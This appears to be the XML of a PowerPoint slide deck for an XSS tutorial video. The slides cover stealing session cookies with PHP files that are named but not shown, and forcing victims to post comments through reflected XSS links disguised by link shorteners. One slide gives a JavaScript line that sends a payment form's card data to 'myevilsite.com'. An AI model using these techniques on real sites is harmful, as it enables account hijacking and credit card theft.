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70" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="27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27/1/2015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27/1/2015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27/1/2015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4000" t="1000" b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27/1/2015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Malicious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XSS	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#4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This video we are going to focus on doing!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will start with stealing cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then we will move onto making forced actions on a site with a Reflected Attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>With these skills, you can perform many other attacks.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Cookies are abundant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Most, if not all website you log into have a remember me function meaning they give you a cookie with a session/auth code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Meaning if we use a cookie attack on a website where the user needs to be logged on to see the page. We will have a cookie with their auth code, that we can use to login as them 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 basic Cookie Stealer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Using the code we learned in the previous two tutorials we can easily set up a cookie stealing system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You can download the new modified 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files. Index.php  and  cookiemonster.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let’s Steal some cookies!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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ower of Reflected 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doubt you have heard a story of someone clicking a link and having something scammed from their online account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chances are that was done with some sort of reflected attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can force a person’s hand quite a fair bit with JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/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 Forced Comment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construct an attack that when a person clicks on a link to our test website it forces them to make a comment like “XSS is Great!” before they even have a chance to say no.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This will be a rather long link, but nothing a link shortening service can fix.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 note on changing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used the DOM objects to modify the contents of the loaded webpage.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You could if you wished, use the same technique with a payment section of a site and change where the form sends the credit card info too. Something like:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>theform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>”).action=“http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>://myevilsite.com/ process.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>”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Bypassing Basic Filters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333</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)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Malicious Attacks</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Cookies are abundant</vt:lpstr>
      <vt:lpstr>A basic Cookie Stealer</vt:lpstr>
      <vt:lpstr>Power of Reflected XSS</vt:lpstr>
      <vt:lpstr>A Forced Comment</vt:lpstr>
      <vt:lpstr>A note on changing info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129</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-22T18:12:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-01-27T07:39:36Z</dcterms:modified>
</cp:coreProperties>
</file>